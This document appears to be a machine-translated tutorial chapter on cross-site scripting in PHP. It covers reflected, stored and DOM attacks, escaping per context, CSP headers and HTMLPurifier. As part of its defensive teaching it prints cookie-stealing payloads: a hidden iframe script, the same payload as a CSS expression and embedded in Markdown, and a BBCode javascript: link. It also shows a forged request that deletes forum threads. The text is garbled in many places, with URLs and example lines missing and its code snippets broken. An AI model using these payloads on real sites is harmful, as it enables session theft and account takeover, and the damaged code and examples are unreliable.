Cross-site scripting (XSS) is perhaps the most common type of vulnerability widespread in web applications. According to statistics, about 65% of sites are in one form or another vulnerable to XSS attacks. This data should scare you as it scares me.

What is Cross Site Scripting?

An XSS attack occurs when an attacker is able to inject a script (often JavaScript) into a page issued by a web application and execute it in the client’s browser. This is usually done by switching the HTML data context to the scripting context, most often when new HTML, Javascript, or CSS markup is being injected. There are plenty of places in HTML to add an executable script to a page, and browsers provide many ways to do this. Any input to the web application, such as HTTP request parameters, can inject code.

One of the problems associated with XSS is the constant underestimation on the part of programmers, which is atypical for vulnerabilities of such a serious level. Developers are often unaware of the degree of threat and usually build defenses based on misconceptions and bad approaches. This is especially true for PHP, if the code is written by developers without sufficient skills and knowledge. In addition, real-world examples of XSS attacks look simple and naive, so programmers who study them consider their protection to be sufficient as long as they are satisfied with it. It’s not hard to see where 65% of vulnerable sites come from.

If an attacker can inject JavaScript into web pages and execute it, then he is able to execute any JavaScript in the user’s browser. And that gives you complete control. Indeed, from the browser’s point of view, the script was obtained from a web application, which is automatically considered a reliable source.

Therefore, I want to remind you: any data that was not created by PHP itself for the current request is not reliable. This also applies to a browser that is separate from the web application.

The browser trusts everything it receives from the server, and this is one of the main reasons for cross-site scripting. Fortunately, the problem is solvable, which we’ll talk about below.

We can apply this principle even more broadly to the very environment of the JavaScript application in the browser. Client-side JavaScript code ranges from very simple to extremely complex, often a separate client-side web application. Such applications are worth protecting as well as any other. They should not rely on data received from remote sources (including from an application on the server), applying validation and making sure that the content displayed in the DOM is correctly escaped or processed.

Embedded scripts can be used for a wide variety of tasks. It:

  • stealing cookies and authorization data,
  • making HTTP requests on behalf of the user,
  • redirecting users to infected sites,
  • getting access to read and change local storage of the browser,
  • performing complex calculations and sending the results to the attacker’s server,
  • application of exploits to the browser and download of malware,
  • emulation of user activity for clickjacking,
  • overwriting or gaining control over browser applications,
  • attacks on browser extensions –

and so on, you can continue indefinitely.

Replacing the interface (UI Redress, clickjacking)

While a direct attack on a server is completely independent, clickjacking is inextricably linked with cross-site scripting, as it uses similar sets of vectors to attack. Sometimes it is difficult to distinguish between them, because one attack technique helps the successful execution of another.

Interface spoofing is any attempt by an attacker to change the user interface of a web application. This allows an attacker to inject new links, new HTML code to resize, hide / obscure the original interface, etc. If such an attack is performed to trick the user into clicking on an embedded link or button, then it is usually referred to as clickjacking.

Most of this chapter focuses on XSS spoofing. However, there are other ways of spoofing when frames are used for embedding. We’ll take a closer look at this in Chapter 4.

Cross-site scripting example

Let’s imagine that an attacker stumbles upon a forum that allows users to display a small caption under their comments. The attacker creates an account, spams all threads within reach, applying the following signature to his messages:

<script>document.write('<iframe src="'
    + document.cookie.escape() + '" height=0 width=0 />');</script>

By some miracle, the forum engine includes this signature in all spam topics, and users start downloading this code. The result is obvious. The attacker injects an iframe into the page, which will appear as a tiny dot (zero size) at the very bottom of the page without attracting any attention. The browser will send a request for the content of the iframe, and the cookie values ​​of each forum member will be passed to the attacker’s URI as a GET parameter. They can be matched and used for further attacks. While regular members are not interested in an attacker, well-planned trolling will undoubtedly attract the attention of a moderator or administrator, whose cookies can be very useful for gaining administrative access to the forum.

This is a simple example, but you can expand on it. Let’s say an attacker wants to know the username associated with the stolen cookies. Easy! It is enough to add a DOM request code to the attacker’s URL, which will return the name and include it in the username = parameter of the GET request. Or did the attacker need information about the browser to bypass the fingerprint protection of the session? It is enough to include data from navigator.userAgent.

This simple attack has many consequences. For example, you can get administrator rights and control over a forum. Therefore, it is inappropriate to underestimate the capabilities of an XSS attack.

Of course, there is a flaw in this example in the attacker’s approach. Consider an obvious way to protect yourself. All sensitive cookies are marked with the HttpOnly flag, which prevents JavaScript from accessing the data in these files. Basically, you have to remember that if an attacker injects JavaScript, then this script can do anything. If the attacker fails to gain access to the cookie and conduct an attack using it, then he will do what all good programmers should do: write the code for an effective automated attack.

    var params = 'type=topic&action=delete&id=347';
    var http = new XMLHttpRequest();'POST', '', true);
    http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http.setRequestHeader("Content-length", params.length);
    http.setRequestHeader("Connection", "close");
    http.onreadystatechange = function() {
        if(http.readyState == 4 && http.status == 200) {
            // Do something else.

The above shows one way to send a POST request to delete a forum thread. We can set it to fire only for the moderator (that is, if the username is displayed somewhere, we can compare it with a list of known moderators or detect special styles applied to the moderator).

As the above suggests, HttpOnly cookies have limited use in protecting against XSS. They block the capture of cookies, but do not prevent them from being used during an XSS attack. In addition, the attacker would prefer not to leave traces in the visible markup so as not to arouse suspicion if he himself does not want to be detected.

Types of XSS attacks

XSS attacks can be classified in several ways. One of them is the way in which malicious input data gets into web applications. The input data of the application can include the result of the current request, saved for inclusion in a subsequent output request. Or, the data can be passed to JavaScript-based DOM operations. Thus, the following types of attacks are obtained.

Reflected XSS attack

Here, the untrustworthy input sent to the web application is immediately included in the application output, that is, it is “reflected” from the server to the browser in the same request. Reflection occurs with error messages, search content, post previews, and more. This form of attack can be staged to convince a user to click a link or submit data from an attacker’s form. Getting a user to click on untrusted links sometimes requires social engineering, a spoofing attack, or a link shortening service. Social networks and the shortening services themselves are especially vulnerable to spoofing URLs using shortened links, since such links are a common occurrence on these resources. Be careful and check carefully what you click on!

Stored XSS attack

When a malicious payload is stored somewhere and retrieved as the user views data, the attack is referred to as stored. In addition to databases, there are many other places, including caches and logs, that are also suitable for long-term data storage. There are already known cases of attacks with injection into the logs.

DOM based XSS attack

DOM-based attacks can be deflected or persistent. The difference is where the attack is directed. Most often, they try to immediately change the markup of the HTML document. However, HTML can also be modified with JavaScript using the DOM. Elements successfully embedded in HTML can later be used in DOM operations in JavaScript. Vulnerabilities in JS libraries or their misuse are also targets of attacks.

Cross-site scripting and injection context

An XSS attack is successful if context is injected during it. The term “context” describes how browsers interpret the content of an HTML document. Browsers recognize a number of key contexts including HTML code, HTML attributes, JavaScript, URL, CSS.

The attacker’s goal is to take data intended for one of these contexts and force the browser to interpret it in a different context. For example:

<div style="background:<?php echo $colour ?>;">

$ color is populated from a database of user preferences that affect the background color for the text block. The value is entered in the CSS context that is a child of the HTML attribute context. That is, we added CSS to the style attribute. It might seem like it is not necessary to avoid such a context trap, but consider the following example:

$colour = "expression(document.write('<iframe src="
    .= "' + document.cookie.escape() + "
    .= "' height=0 width=0 />'))";

<div style="background:<?php echo $colour ?>;">

If an attacker successfully injects this color, then he can inject a CSS expression that will execute certain JavaScript in Internet Explorer. In other words, an attacker would be able to switch the current context by injecting a new JavaScript context.

Looking at the previous example, some readers will remember about escaping. Let’s use it:

$colour = "expression(document.write('<iframe src="
    .= "' + document.cookie.escape() + "
    .= "' height=0 width=0 />'))";

<div style="background:<?php echo htmlspecialchars($colour, ENT_QUOTES, 'UTF-8') ?>;">

If you test this in IE, you will quickly find that something very bad is going on. The XSS attack still works successfully – even after escaping with the htmlspecialchars () function to avoid the $ color!

This is how important it is to get the context right. Each context requires a different escaping method because each context has its own special characters and a different need for escaping. It’s not enough to throw around htmlspecialchars () and htmlentities () and pray that your web application is safe.

What went wrong in the previous example? What caused the browser to unescape the HTML attributes before interpreting the context? We ignored the fact that two contexts need to be escaped.

CSS first had to escape the $ color, and only then did the HTML escape. This would ensure that $ color is converted to a valid string literal, without parentheses, quotes, spaces, or other characters that expression () can be embedded. Not realizing that our attribute spans two contexts, we escaped it as if it were just one HTML attribute. Quite a common mistake.

A lesson can be learned from this situation: context is important. In an XSS attack, an attacker will always try to jump from the current context to another where JavaScript can be executed. If you are able to define all the contexts in the HTML output in terms of nesting, then you are ten steps closer to successfully protecting your web application from XSS.

Let’s take another example:

<a href=""></a>

Aside from unreliable input data, this code can be parsed as follows:

  1. There is a URL context, i.e. the value of the href attribute.
  2. There is an HTML attribute context, that is, the parents of the URL context.
  3. There is the HTML body context, i.e. the text inside the <a>tag.

These are three different contexts. So up to three escapes will be needed if data sources are identified as unreliable. In the next section, we’ll take a closer look at escaping as a protection against XSS.

Cross-site scripting protection

It is possible to protect against XSS, but protection should be applied consistently, without exceptions and simplifications, preferably from the very beginning of the development of a web application, while everyone has fresh memories of the workflow in their memory. Implementing protection at a later stage can be costly.

Input validation

Input validation is only the first line of defense for a web application. With this type of protection, we only know how unreliable data is currently being used, and at the stage of obtaining data, we cannot predict where and how it will be applied further. This includes almost all textual data, since we must always provide the user with the ability to write quotes, angle brackets and other characters.

Validation works best by preventing XSS attacks on data that have extreme values. Let’s say an integer shouldn’t contain HTML-specific characters. Parameters such as country name must match a predefined list of real countries, etc.

Input validation helps you control data with a specific syntax. For example, a valid URL must begin with http: // or https: //, not the much more dangerous javascript: or data: constructs. Essentially, all addresses derived from unverified input should be checked for these tags. Escaping a javascript: or data: URI has the same effect as escaping a legal URL. That is, no effect at all.

While input validation cannot block all of the malicious payload in an XSS attack, it can stop the most obvious types of attacks. Input validation was discussed in detail in the second part of the book.

Escaping (as well as encoding)

Escaping output data ensures that the data will not be misinterpreted by the receiving parser or interpreter. Obvious examples are the less than and greater than signs, which denote HTML tags. By allowing these characters to be inserted from untrusted input, an attacker can inject new tags that the browser will render. Usually these characters are replaced by the sequences> and $ lt ;.

Replacing characters preserves the meaning of the escaped data. Escaping simply replaces characters with a specific meaning with alternatives. Usually the hexadecimal representation is used, or something more readable like HTML sequences (if safe to use).

As mentioned in the chapter on contexts, how you escaped depends on what type of content you are embedding. Escaping HTML code is different from escaping JavaScript, which in turn is different from escaping addresses. The use of an incorrect escaping strategy for a certain context can lead to ineffective protection, to create a vulnerability that an attacker can exploit.

To facilitate shielding, it is recommended to use a separate class designed for this purpose. PHP cannot provide all the required escaping functions out of the box, and much of it is not as secure as most developers think.
Let’s take a look at the escaping rules that apply to the most common contexts: HTML body, HTML attributes, JavaScript, URL, and CSS.

Never enter data except from trusted places

Before exploring escaping strategies, you need to make sure your web application templates do not misplace data. This refers to injecting data into sensitive areas of HTML that give an attacker the ability to influence the order in which the markup is processed, and which typically do not require escaping when used by a programmer. Let’s look at examples where […] is the data being injected:



<div ...="test"/>

<... href=""/>


Each of the above locations is dangerous. Allowing data in a script tag outside of string and numeric literals allows JavaScript to be injected in an attack. The data placed in HTML comments can be used to trigger Internet Explorer conditionals and other unexpected actions. The next two places are more obvious, since no one would allow an attacker to influence their tags or attribute names – we are trying to prevent this! Finally, as in the case of scripts, we cannot allow attackers to inject directly into CSS, as this will allow us to perform interface spoofing attacks and execute scripts using the expression () function supported by Internet Explorer.

Always Escape HTML Before Embedding Data in HTML Body

The HTML body context refers to text content that is enclosed in tags. For example, text between tags <body><div>or any other paired tags for storing text. Data embedded in the content of any tags must be HTML escaped.

HTML escaping is well known in PHP in the form of the htmlspecialchars () function.

Always Escape HTML Attributes Before Injecting Data Into Their Context

The HTML attribute context refers to all element values ​​except for properties, which are interpreted by the browser as CDATA. This exception is quite confusing, but it mostly refers to non-XML based HTML standards, where JavaScript can be included in event attributes unescaped. For all other attributes, you have the following two options:

  1. If the attribute value is quoted, then you MAY use HTML escaping.
  2. However, if the value is specified without quotes, then you MUST use HTML attribute escaping.

Also, the second option is used when the rules for casting attributes may be unclear. For example, HTML5 considers it perfectly acceptable to use unquoted attribute values, and there are many examples of this clever approach in real projects. In any unclear situation, proceed with caution.

Always Escape JavaScript Before Embedding in Data Values

Data values ​​in JavaScript are mostly strings. Since you cannot escape numbers, there is an additional rule: always check the validity of numbers …

Content protection policy

A key element of all our cross-site scripting talk is that the browser runs without question all JavaScript it receives from the server, regardless of the source of the code injection. When receiving an HTML document, the browser has no way of knowing which of the embedded resources are safe and which are not. What if we could change that?

Content Protection Policy (CSP) is an HTTP header that whitelists trusted resource sources that the browser can trust. Any source not listed in the allowed list is considered unreliable and simply ignored. Consider the following:

X-Content-Security-Policy: script-src 'self'

This CSP header tells the browser to only trust JavaScript source URLs that point to the current domain. The browser will then load scripts from this source, but completely ignore all others. It means that won’t load if an attacker somehow manages to inject it. Also, all inline scripts such as tags

If we need to use JavaScript from a source other than the original address, then we can whitelist it. For example, let’s add a jQuery CDN url.

X-Content-Security-Policy: script-src 'self'

Other resource directives can be added, such as the path to the CSS stylesheet, semicoloning the directives and the allowed addresses.

X-Content-Security-Policy: script-src 'self'; style-src 'self'

The header value format is very simple. The value consists of a script-src directive followed by a space-separated list of sources used as a whitelist. The source can be a quoted keyword such as ‘self’, or a URL. The URL value is matched against the resulting list. Information not in the URL can be freely changed in the HTML document. Indication prevents loading scripts from or because we have explicitly set the allowed domains. To allow all subdomains, you can simply specify . The same goes for local paths, ports, url schemes, etc.

The essence of the CSP whitelist is simple. If you create a list of resources of a specific type, then everything that is not included in it will not be loaded. If you don’t define a list for a resource type, then the browser discards all resources of that type by default.

The following resource directives are supported:

  • connect-src: Limits the sources to which you can connect using xmlhttprequest, websockets, etc.
  • font-src: restricts sources for web fonts.
  • frame-src: Limits URLs for frames.
  • img-src: Limits image sources.
  • media-src: Limits video and audio sources.
  • object-src: restricts sources for Flash and other plugins.
  • script-src: Limits sources for script files.
  • style-src: Limits sources for CSS.

To set safe standard parameters, there is a special directive default-src, with which you can initially add links to the whitelist for all the listed categories.

X-Content-Security-Policy: default-src 'self'; script-src 'self'

This will restrict the allowed resources to the current domain, but also add an exception for the jQuery script. This use immediately closes all untrusted sources and allows only those that are considered to be known to be allowed.

In addition to URLs, allowed sources can be assigned the following keywords, which must be enclosed in single quotes:

‘none’ ‘self’ ‘unsafe-inline’ ‘unsafe-eval’

Did you notice the word unsafe, that is, “unsafe”? The best way to use CSPs is not to take the approaches attackers take. Do they want to inject inline scripts or other resources? If we avoid inline ourselves, our web applications can tell browsers to ignore all inline content without exception. We will use external script files and addEventListener () functions instead of event attributes. But since you come up with a rule for yourself, then you can’t do without a few useful exceptions, right? Not this way. Forget about any exceptions. Including the ‘unsafe-inline’ option goes against the very purpose of the CSP.

The ‘none’ keyword means nothing. If you set it as the resource source, then the parameter will cause the browser to ignore all resources of the specified type. This will add minor problems for you, but I suggest doing something like the following example so that your CSP’s whitelist is always limited to only what it explicitly allows:

X-Content-Security-Policy: default-src 'none'; script-src 'self'; style-src 'self'

And one last caveat. Since CSP is a new solution, you will need to duplicate the X-Content-Security-Policy header to make sure that WebKit browsers like Safari and Chrome will also understand it. A gift from WebKit for you.

X-Content-Security-Policy: default-src 'none'; script-src 'self'; style-src 'self'
X-WebKit-CSP: default-src 'none'; script-src 'self'; style-src 'self'

Defining the user’s browser

HTML cleanup

At some point, a web application will be faced with the need to include externally specified HTML code in its web page without applying escaping to it. Illustrative examples include citing forum posts, blog comments, edit forms, and posts from RSS or Atom. Escaping such data will be corrupted and corrupted, so instead of being escaped, you have to carefully filter the data to make sure that all the dangerous elements are eliminated.

Have you noticed that I wrote about HTML code “externally generated” and not “generated externally”? Many web applications allow users to include alternatives such as BBCode, Markdown, or Textile instead of HTML markup. It is a common mistake in PHP to think that these markup languages ​​prevent XSS attacks. Complete nonsense. The purpose of these languages ​​is to make it easier and easier for users to create rich text without having to work with HTML. Not everyone knows HTML, and the language itself does not exactly match its SGML roots. Manually creating long blocks of rich text in HTML is long and painful.

HTML from such input is generated on the server. This implies trust transactions, the very trust of which is a common mistake. The resulting HTML is still “externally supplied”. We cannot consider it safe. This is more obvious in the example of a blog feed, whose posts are valid HTML before they are generated.

Consider the following piece of code:

[url=javascript:alert(‘I can haz Cookie?n’+document.cookie)]Free Bitcoins Here![/url]

BBcode restricts HTML by default, but it does not provide absolute invulnerability. For example, most generators will ignore the use of HTTP URLs and will skip them. Highlight Markdown:

I am a Markdown paragraph.<script>document.write(‘<iframe src=”‘ + document.cookie.escape() + ‘” height=0 width=0 />’);</script>

There’s no need to panic. I swear I am just plain text!

Markdown is a popular alternative for writing HTML, but it also allows authors to mix HTML with Markdown. Indeed, Markdown generators do not pay attention to the included XSS load.

Obviously, you need to apply a set of HTML escaping measures, regardless of what type of markup we are going to include in the application output stream after the generation and other operations are complete. There are no exceptions. Input data remains unreliable until we have processed it and made sure it is safe.

HTML cleanup is a time consuming process of parsing input data, applying a list of allowed elements, attributes, and other necessary things. This is not for the faint of heart, it is very easy to make mistakes, and PHP itself suffers from many unsafe libraries, the authors of which claim to do everything right. Therefore, do not choose “fashionable” solutions, write them yourself.

The only PHP library that actually produces secure HTML is HTMLPurifier. It is actively maintained, largely tested, and I highly recommend it. HTMLPurifier is quite simple to work with, in fact, you only need to set the allowed elements:

// Basic setup without a cache
$config = HTMLPurifier_Config::createDefault();
$config->set('Core', 'Encoding', 'UTF-8');
$config->set('HTML', 'Doctype', 'HTML 4.01 Transitional');
// Create the whitelist
$config->set('HTML.Allowed', 'p,b,a[href],i'); // basic formatting and links
$sanitiser = new HTMLPurifier($config);
$output = $sanitiser->purify($untrustedHtml);

Don’t use other libraries as HTML handlers unless you’re sure what you are doing.